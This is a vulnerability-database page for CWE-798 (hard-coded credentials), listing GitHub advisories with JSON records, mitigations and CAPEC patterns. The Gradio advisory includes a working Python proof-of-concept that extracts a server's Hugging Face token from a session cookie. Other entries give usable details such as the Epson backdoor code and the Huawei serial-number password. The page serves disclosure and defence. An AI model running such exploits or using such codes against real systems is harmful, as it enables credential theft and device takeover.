CWE-798
Allowed-with-ReviewUse of Hard-coded Credentials
Abstraction: Base · Status: Draft
The product contains hard-coded credentials, such as a password or cryptographic key.
2178 vulnerabilities reference this CWE, most recent first.
GHSA-H379-Q7PP-897W
Vulnerability from github – Published: 2022-05-17 02:58 – Updated: 2022-05-17 02:58An issue was discovered in Schneider Electric PowerLogic PM8ECC device 2.651 and older. Undocumented hard-coded credentials allow access to the device.
{
"affected": [],
"aliases": [
"CVE-2016-5818"
],
"database_specific": {
"cwe_ids": [
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-02-13T21:59:00Z",
"severity": "CRITICAL"
},
"details": "An issue was discovered in Schneider Electric PowerLogic PM8ECC device 2.651 and older. Undocumented hard-coded credentials allow access to the device.",
"id": "GHSA-h379-q7pp-897w",
"modified": "2022-05-17T02:58:49Z",
"published": "2022-05-17T02:58:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-5818"
},
{
"type": "WEB",
"url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-292-01"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/93602"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-H3FJ-FCHJ-5WRP
Vulnerability from github – Published: 2026-05-13 18:30 – Updated: 2026-05-13 18:30Huawei HG630 V2 router contains an authentication bypass vulnerability that allows unauthenticated attackers to obtain administrative access by retrieving the device serial number. Attackers can query the /api/system/deviceinfo endpoint without authentication to extract the SerialNumber field, then use the last 8 characters as the default password to login to the router.
{
"affected": [],
"aliases": [
"CVE-2020-37220"
],
"database_specific": {
"cwe_ids": [
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-13T16:16:33Z",
"severity": "HIGH"
},
"details": "Huawei HG630 V2 router contains an authentication bypass vulnerability that allows unauthenticated attackers to obtain administrative access by retrieving the device serial number. Attackers can query the /api/system/deviceinfo endpoint without authentication to extract the SerialNumber field, then use the last 8 characters as the default password to login to the router.",
"id": "GHSA-h3fj-fchj-5wrp",
"modified": "2026-05-13T18:30:53Z",
"published": "2026-05-13T18:30:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37220"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/48310"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/huawei-hg630-v2-router-authentication-bypass-via-serial-number"
},
{
"type": "WEB",
"url": "https://www.youtube.com/watch?v=vOrIL7L_cVc"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-H3H8-3V2V-RG7M
Vulnerability from github – Published: 2026-03-01 01:00 – Updated: 2026-06-05 17:56Summary
Gradio applications running outside of Hugging Face Spaces automatically enable "mocked" OAuth routes when OAuth components (e.g. gr.LoginButton) are used. When a user visits /login/huggingface, the server retrieves its own Hugging Face access token via huggingface_hub.get_token() and stores it in the visitor's session cookie. If the application is network-accessible, any remote attacker can trigger this flow to steal the server owner's HF token. The session cookie is signed with a hardcoded secret derived from the string "-v4", making the payload trivially decodable.
Affected Component
gradio/oauth.py — functions attach_oauth(), _add_mocked_oauth_routes(), and _get_mocked_oauth_info().
Root Cause Analysis
1. Real token injected into every visitor's session
When Gradio detects it is not running inside a Hugging Face Space (get_space() is None), it registers mocked OAuth routes via _add_mocked_oauth_routes() (line 44).
The function _get_mocked_oauth_info() (line 307) calls huggingface_hub.get_token() to retrieve the real HF access token configured on the host machine (via HF_TOKEN environment variable or huggingface-cli login). This token is stored in a dict that is then injected into the session of any visitor who hits /login/callback (line 183):
request.session["oauth_info"] = mocked_oauth_info
The mocked_oauth_info dict contains the real token at key access_token (line 329):
return {
"access_token": token, # <-- real HF token from server
...
}
2. Hardcoded session signing secret
The SessionMiddleware secret is derived from OAUTH_CLIENT_SECRET (line 50):
session_secret = (OAUTH_CLIENT_SECRET or "") + "-v4"
When running outside a Space, OAUTH_CLIENT_SECRET is not set, so the secret becomes the constant string "-v4", hashed with SHA-256. Since this value is public (hardcoded in source code), any attacker can decode the session cookie payload without needing to break the signature.
In practice, Starlette's SessionMiddleware stores the session data as plaintext base64 in the cookie — the signature only provides integrity, not confidentiality. The token is readable by simply base64-decoding the cookie payload.
Attack Scenario
Prerequisites
- A Gradio app using OAuth components (
gr.LoginButton,gr.OAuthProfile, etc.) - The app is network-accessible (e.g.
server_name="0.0.0.0",share=True, port forwarding, etc.) - The host machine has a Hugging Face token configured
OAUTH_CLIENT_SECRETis not set (default outside of Spaces)
Steps
- Attacker sends a GET request to
http://<target>:7860/login/huggingface - The server responds with a 307 redirect to
/login/callback - The attacker follows the redirect; the server sets a
sessioncookie containing the real HF token - The attacker base64-decodes the cookie payload (everything before the first
.) to extract theaccess_token
Minimal Vulnerable Application
import gradio as gr
from huggingface_hub import login
login(token="hf_xxx...")
def hello(profile: gr.OAuthProfile | None) -> str:
if profile is None:
return "Not logged in."
return f"Hello {profile.name}"
with gr.Blocks() as demo:
gr.LoginButton()
gr.Markdown().attach_load_event(hello, None)
demo.launch(server_name="0.0.0.0")
Proof of Concept
#!/usr/bin/env python3
"""
POC: Gradio mocked OAuth leaks server's HF token via session + weak secret
Usage: python exploit.py --target http://victim:7860
python exploit.py --target http://victim:7860 --proxy http://127.0.0.1:8080
"""
import argparse
import base64
import json
import sys
import requests
def main():
ap = argparse.ArgumentParser()
ap.add_argument("--target", required=True, help="Base URL, e.g. http://host:7860")
ap.add_argument("--proxy", default=None, help="HTTP proxy, e.g. http://127.0.0.1:8080")
args = ap.parse_args()
base = args.target.rstrip("/")
proxies = {"http": args.proxy, "https": args.proxy} if args.proxy else None
# 1. Trigger mocked OAuth flow — server injects its own HF token into our session
s = requests.Session()
s.get(f"{base}/login/huggingface", allow_redirects=True, verify=False, proxies=proxies)
cookie = s.cookies.get("session")
if not cookie:
print("[-] No session cookie received; target may not be vulnerable.", file=sys.stderr)
sys.exit(1)
# 2. Decode the cookie payload (base64 before the first ".")
payload_b64 = cookie.split(".")[0]
payload_b64 += "=" * (-len(payload_b64) % 4) # fix padding
data = json.loads(base64.b64decode(payload_b64))
token = data.get("oauth_info", {}).get("access_token")
if token:
print(f"[+] Leaked HF token: {token}")
else:
print("[-] No access_token found in session.", file=sys.stderr)
sys.exit(1)
if __name__ == "__main__":
main()
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "gradio"
},
"ranges": [
{
"events": [
{
"introduced": "4.16.0"
},
{
"fixed": "6.6.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27167"
],
"database_specific": {
"cwe_ids": [
"CWE-522",
"CWE-798"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-01T01:00:33Z",
"nvd_published_at": "2026-02-27T22:16:22Z",
"severity": "LOW"
},
"details": "## Summary\n\nGradio applications running outside of Hugging Face Spaces automatically enable \"mocked\" OAuth routes when OAuth components (e.g. `gr.LoginButton`) are used. When a user visits `/login/huggingface`, the server retrieves its own Hugging Face access token via `huggingface_hub.get_token()` and stores it in the visitor\u0027s session cookie. If the application is network-accessible, any remote attacker can trigger this flow to steal the server owner\u0027s HF token. The session cookie is signed with a hardcoded secret derived from the string `\"-v4\"`, making the payload trivially decodable.\n\n## Affected Component\n\n`gradio/oauth.py` \u2014 functions `attach_oauth()`, `_add_mocked_oauth_routes()`, and `_get_mocked_oauth_info()`.\n\n## Root Cause Analysis\n\n### 1. Real token injected into every visitor\u0027s session\n\nWhen Gradio detects it is **not** running inside a Hugging Face Space (`get_space() is None`), it registers mocked OAuth routes via `_add_mocked_oauth_routes()` (line 44).\n\nThe function `_get_mocked_oauth_info()` (line 307) calls `huggingface_hub.get_token()` to retrieve the **real** HF access token configured on the host machine (via `HF_TOKEN` environment variable or `huggingface-cli login`). This token is stored in a dict that is then injected into the session of **any visitor** who hits `/login/callback` (line 183):\n\n```python\nrequest.session[\"oauth_info\"] = mocked_oauth_info\n```\n\nThe `mocked_oauth_info` dict contains the real token at key `access_token` (line 329):\n\n```python\nreturn {\n \"access_token\": token, # \u003c-- real HF token from server\n ...\n}\n```\n\n### 2. Hardcoded session signing secret\n\nThe `SessionMiddleware` secret is derived from `OAUTH_CLIENT_SECRET` (line 50):\n\n```python\nsession_secret = (OAUTH_CLIENT_SECRET or \"\") + \"-v4\"\n```\n\nWhen running outside a Space, `OAUTH_CLIENT_SECRET` is not set, so the secret becomes the **constant string `\"-v4\"`**, hashed with SHA-256. Since this value is public (hardcoded in source code), any attacker can decode the session cookie payload without needing to break the signature.\n\nIn practice, Starlette\u0027s `SessionMiddleware` stores the session data as **plaintext base64** in the cookie \u2014 the signature only provides integrity, not confidentiality. The token is readable by simply base64-decoding the cookie payload.\n\n## Attack Scenario\n\n### Prerequisites\n\n- A Gradio app using OAuth components (`gr.LoginButton`, `gr.OAuthProfile`, etc.)\n- The app is network-accessible (e.g. `server_name=\"0.0.0.0\"`, `share=True`, port forwarding, etc.)\n- The host machine has a Hugging Face token configured\n- `OAUTH_CLIENT_SECRET` is **not** set (default outside of Spaces)\n\n### Steps\n\n1. Attacker sends a GET request to `http://\u003ctarget\u003e:7860/login/huggingface`\n2. The server responds with a 307 redirect to `/login/callback`\n3. The attacker follows the redirect; the server sets a `session` cookie containing the real HF token\n4. The attacker base64-decodes the cookie payload (everything before the first `.`) to extract the `access_token`\n\n\n## Minimal Vulnerable Application\n\n```python\nimport gradio as gr\nfrom huggingface_hub import login\n\nlogin(token=\"hf_xxx...\")\n\ndef hello(profile: gr.OAuthProfile | None) -\u003e str:\n if profile is None:\n return \"Not logged in.\"\n return f\"Hello {profile.name}\"\n\nwith gr.Blocks() as demo:\n gr.LoginButton()\n gr.Markdown().attach_load_event(hello, None)\n\ndemo.launch(server_name=\"0.0.0.0\")\n\n```\n\n## Proof of Concept\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPOC: Gradio mocked OAuth leaks server\u0027s HF token via session + weak secret\nUsage: python exploit.py --target http://victim:7860\n python exploit.py --target http://victim:7860 --proxy http://127.0.0.1:8080\n\"\"\"\nimport argparse\nimport base64\nimport json\nimport sys\nimport requests\n\n\ndef main():\n ap = argparse.ArgumentParser()\n ap.add_argument(\"--target\", required=True, help=\"Base URL, e.g. http://host:7860\")\n ap.add_argument(\"--proxy\", default=None, help=\"HTTP proxy, e.g. http://127.0.0.1:8080\")\n args = ap.parse_args()\n\n base = args.target.rstrip(\"/\")\n proxies = {\"http\": args.proxy, \"https\": args.proxy} if args.proxy else None\n\n # 1. Trigger mocked OAuth flow \u2014 server injects its own HF token into our session\n s = requests.Session()\n s.get(f\"{base}/login/huggingface\", allow_redirects=True, verify=False, proxies=proxies)\n\n cookie = s.cookies.get(\"session\")\n if not cookie:\n print(\"[-] No session cookie received; target may not be vulnerable.\", file=sys.stderr)\n sys.exit(1)\n\n # 2. Decode the cookie payload (base64 before the first \".\")\n payload_b64 = cookie.split(\".\")[0]\n payload_b64 += \"=\" * (-len(payload_b64) % 4) # fix padding\n data = json.loads(base64.b64decode(payload_b64))\n token = data.get(\"oauth_info\", {}).get(\"access_token\")\n\n if token:\n print(f\"[+] Leaked HF token: {token}\")\n else:\n print(\"[-] No access_token found in session.\", file=sys.stderr)\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n```",
"id": "GHSA-h3h8-3v2v-rg7m",
"modified": "2026-06-05T17:56:29Z",
"published": "2026-03-01T01:00:33Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-h3h8-3v2v-rg7m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27167"
},
{
"type": "WEB",
"url": "https://github.com/gradio-app/gradio/commit/dfee0da06d0aa94b3c2684131e7898d5d5c1911e"
},
{
"type": "PACKAGE",
"url": "https://github.com/gradio-app/gradio"
},
{
"type": "WEB",
"url": "https://github.com/gradio-app/gradio/releases/tag/gradio@6.6.0"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/gradio/PYSEC-2026-63.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Gradio: Mocked OAuth Login Exposes Server Credentials and Uses Hardcoded Session Secret"
}
GHSA-H49V-GCM2-4FM3
Vulnerability from github – Published: 2023-10-11 03:30 – Updated: 2024-04-04 08:33Use of default credentials vulnerability in MR-GM2 firmware Ver. 3.00.03 and earlier, and MR-GM3 (-D/-K/-S/-DK/-DKS/-M/-W) firmware Ver. 1.03.45 and earlier allows a network-adjacent unauthenticated attacker to intercept wireless LAN communication, when the affected product performs the communication without changing the pre-shared key from the factory-default configuration.
{
"affected": [],
"aliases": [
"CVE-2023-45194"
],
"database_specific": {
"cwe_ids": [
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-10-11T01:15:08Z",
"severity": "MODERATE"
},
"details": "Use of default credentials vulnerability in MR-GM2 firmware Ver. 3.00.03 and earlier, and MR-GM3 (-D/-K/-S/-DK/-DKS/-M/-W) firmware Ver. 1.03.45 and earlier allows a network-adjacent unauthenticated attacker to intercept wireless LAN communication, when the affected product performs the communication without changing the pre-shared key from the factory-default configuration.",
"id": "GHSA-h49v-gcm2-4fm3",
"modified": "2024-04-04T08:33:12Z",
"published": "2023-10-11T03:30:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45194"
},
{
"type": "WEB",
"url": "https://jvn.jp/en/vu/JVNVU99039725"
},
{
"type": "WEB",
"url": "https://www.mrl.co.jp/20231005_security"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-H4H7-JGFC-7Q2J
Vulnerability from github – Published: 2022-05-24 17:34 – Updated: 2022-05-24 17:34Airleader Master and Easy <= 6.21 devices have default credentials that can be used for a denial of service.
{
"affected": [],
"aliases": [
"CVE-2020-26509"
],
"database_specific": {
"cwe_ids": [
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-11-16T19:15:00Z",
"severity": "HIGH"
},
"details": "Airleader Master and Easy \u003c= 6.21 devices have default credentials that can be used for a denial of service.",
"id": "GHSA-h4h7-jgfc-7q2j",
"modified": "2022-05-24T17:34:16Z",
"published": "2022-05-24T17:34:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26509"
},
{
"type": "WEB",
"url": "https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-033.txt"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-H56F-W4G4-2J9H
Vulnerability from github – Published: 2023-11-14 18:30 – Updated: 2023-11-14 18:30A use of hard-coded credentials vulnerability in Fortinet FortiClient Windows 7.0.0 - 7.0.9 and 7.2.0 - 7.2.1 allows an attacker to bypass system protections via the use of static credentials.
{
"affected": [],
"aliases": [
"CVE-2023-33304"
],
"database_specific": {
"cwe_ids": [
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-11-14T18:15:30Z",
"severity": "MODERATE"
},
"details": "A use of hard-coded credentials vulnerability in Fortinet FortiClient Windows 7.0.0 - 7.0.9 and 7.2.0 - 7.2.1 allows an attacker to bypass system protections via the use of static credentials.",
"id": "GHSA-h56f-w4g4-2j9h",
"modified": "2023-11-14T18:30:27Z",
"published": "2023-11-14T18:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33304"
},
{
"type": "WEB",
"url": "https://fortiguard.com/psirt/FG-IR-23-108"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-H5G5-HRHR-3PH4
Vulnerability from github – Published: 2026-06-12 18:31 – Updated: 2026-07-09 18:31The Aqara IAM/SSO Gateway (gw-builder.aqara.com) used a hardcoded OAuth client credential, which is an instance of "CWE-798: Use of Hard-coded Credentials." This issue has an estimated CVSS of CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N (9.1 Critical). When combined with CVE-2026-50082, CVE-50084, and CVE-50085, this can lead to a fully unauthenticated, remote takeover of affected devices.
{
"affected": [],
"aliases": [
"CVE-2026-50083"
],
"database_specific": {
"cwe_ids": [
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-12T16:16:31Z",
"severity": "CRITICAL"
},
"details": "The Aqara IAM/SSO Gateway (gw-builder.aqara.com) used a hardcoded OAuth client credential, which is an instance of\u00a0\"CWE-798: Use of Hard-coded Credentials.\" This issue has an estimated CVSS of\u00a0CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\u00a0(9.1 Critical). When combined with CVE-2026-50082, CVE-50084, and CVE-50085, this can lead to a fully unauthenticated, remote takeover of affected devices.",
"id": "GHSA-h5g5-hrhr-3ph4",
"modified": "2026-07-09T18:31:22Z",
"published": "2026-06-12T18:31:58Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50083"
},
{
"type": "WEB",
"url": "https://github.com/xn0tsa/theres-no-place-like-home"
},
{
"type": "WEB",
"url": "https://www.runzero.com/advisories/aqara-hardcoded-oauth-cve-2026-50083"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-H5QR-P6V8-2X55
Vulnerability from github – Published: 2023-08-16 18:30 – Updated: 2024-04-04 07:00NPort IAW5000A-I/O Series firmware version v2.2 and prior is affected by a hardcoded credential vulnerabilitywhich poses a potential risk to the security and integrity of the affected device. This vulnerability is attributed to the presence of a hardcoded key, which could potentially facilitate firmware manipulation.
{
"affected": [],
"aliases": [
"CVE-2023-4204"
],
"database_specific": {
"cwe_ids": [
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-08-16T16:15:11Z",
"severity": "CRITICAL"
},
"details": "NPort IAW5000A-I/O Series firmware version v2.2 and prior is affected by a hardcoded credential vulnerabilitywhich poses a potential risk to the security and integrity of the affected device. This vulnerability is attributed to the presence of a hardcoded key, which could potentially facilitate firmware manipulation.\n\n",
"id": "GHSA-h5qr-p6v8-2x55",
"modified": "2024-04-04T07:00:07Z",
"published": "2023-08-16T18:30:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4204"
},
{
"type": "WEB",
"url": "https://www.moxa.com/en/support/product-support/security-advisory/mpsa-230304-nport-iaw5000a-i-o-series-hardcoded-credential-vulnerability"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-H63Q-5H2Q-WX97
Vulnerability from github – Published: 2022-05-24 16:48 – Updated: 2024-04-04 00:58WAGO 852-303 before FW06, 852-1305 before FW06, and 852-1505 before FW03 devices contain hardcoded users and passwords that can be used to login via SSH and TELNET.
{
"affected": [],
"aliases": [
"CVE-2019-12550"
],
"database_specific": {
"cwe_ids": [
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-06-17T17:15:00Z",
"severity": "CRITICAL"
},
"details": "WAGO 852-303 before FW06, 852-1305 before FW06, and 852-1505 before FW03 devices contain hardcoded users and passwords that can be used to login via SSH and TELNET.",
"id": "GHSA-h63q-5h2q-wx97",
"modified": "2024-04-04T00:58:30Z",
"published": "2022-05-24T16:48:08Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12550"
},
{
"type": "WEB",
"url": "https://cert.vde.com/en-us/advisories/vde-2019-013"
},
{
"type": "WEB",
"url": "https://ics-cert.us-cert.gov/advisories/ICSA-19-164-02"
},
{
"type": "WEB",
"url": "https://www.wago.com/us"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-H77G-C8P9-3F4C
Vulnerability from github – Published: 2022-05-13 01:42 – Updated: 2025-04-20 03:46The Epson "EasyMP" software is designed to remotely stream a users computer to supporting projectors.These devices are authenticated using a unique 4-digit code, displayed on-screen - ensuring only those who can view it are streaming.In addition to the password, each projector has a hardcoded "backdoor" code (2270), which authenticates to all devices.
{
"affected": [],
"aliases": [
"CVE-2017-12860"
],
"database_specific": {
"cwe_ids": [
"CWE-798"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-10-10T13:29:00Z",
"severity": "CRITICAL"
},
"details": "The Epson \"EasyMP\" software is designed to remotely stream a users computer to supporting projectors.These devices are authenticated using a unique 4-digit code, displayed on-screen - ensuring only those who can view it are streaming.In addition to the password, each projector has a hardcoded \"backdoor\" code (2270), which authenticates to all devices.",
"id": "GHSA-h77g-c8p9-3f4c",
"modified": "2025-04-20T03:46:27Z",
"published": "2022-05-13T01:42:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12860"
},
{
"type": "WEB",
"url": "https://rhinosecuritylabs.com/research/epson-easymp-remote-projection-vulnerabilities"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
- For outbound authentication: store passwords, keys, and other credentials outside of the code in a strongly-protected, encrypted configuration file or database that is protected from access by all outsiders, including other local users on the same system. Properly protect the key (CWE-320). If you cannot use encryption to protect the file, then make sure that the permissions are as restrictive as possible [REF-7].
- In Windows environments, the Encrypted File System (EFS) may provide some protection.
Mitigation
For inbound authentication: Rather than hard-code a default username and password, key, or other authentication credentials for first time logins, utilize a "first login" mode that requires the user to enter a unique strong password or key.
Mitigation
If the product must contain hard-coded credentials or they cannot be removed, perform access control checks and limit which entities can access the feature that requires the hard-coded credentials. For example, a feature might only be enabled through the system console instead of through a network connection.
Mitigation
- For inbound authentication using passwords: apply strong one-way hashes to passwords and store those hashes in a configuration file or database with appropriate access control. That way, theft of the file/database still requires the attacker to try to crack the password. When handling an incoming password during authentication, take the hash of the password and compare it to the saved hash.
- Use randomly assigned salts for each separate hash that is generated. This increases the amount of computation that an attacker needs to conduct a brute-force attack, possibly limiting the effectiveness of the rainbow table method.
Mitigation
- For front-end to back-end connections: Three solutions are possible, although none are complete.
- The first suggestion involves the use of generated passwords or keys that are changed automatically and must be entered at given time intervals by a system administrator. These passwords will be held in memory and only be valid for the time intervals.
- Next, the passwords or keys should be limited at the back end to only performing actions valid for the front end, as opposed to having full access.
- Finally, the messages sent should be tagged and checksummed with time sensitive values so as to prevent replay-style attacks.
CAPEC-191: Read Sensitive Constants Within an Executable
An adversary engages in activities to discover any sensitive constants present within the compiled code of an executable. These constants may include literal ASCII strings within the file itself, or possibly strings hard-coded into particular routines that can be revealed by code refactoring methods including static and dynamic analysis.
CAPEC-70: Try Common or Default Usernames and Passwords
An adversary may try certain common or default usernames and passwords to gain access into the system and perform unauthorized actions. An adversary may try an intelligent brute force using empty passwords, known vendor default credentials, as well as a dictionary of common usernames and passwords. Many vendor products come preconfigured with default (and thus well-known) usernames and passwords that should be deleted prior to usage in a production environment. It is a common mistake to forget to remove these default login credentials. Another problem is that users would pick very simple (common) passwords (e.g. "secret" or "password") that make it easier for the attacker to gain access to the system compared to using a brute force attack or even a dictionary attack using a full dictionary.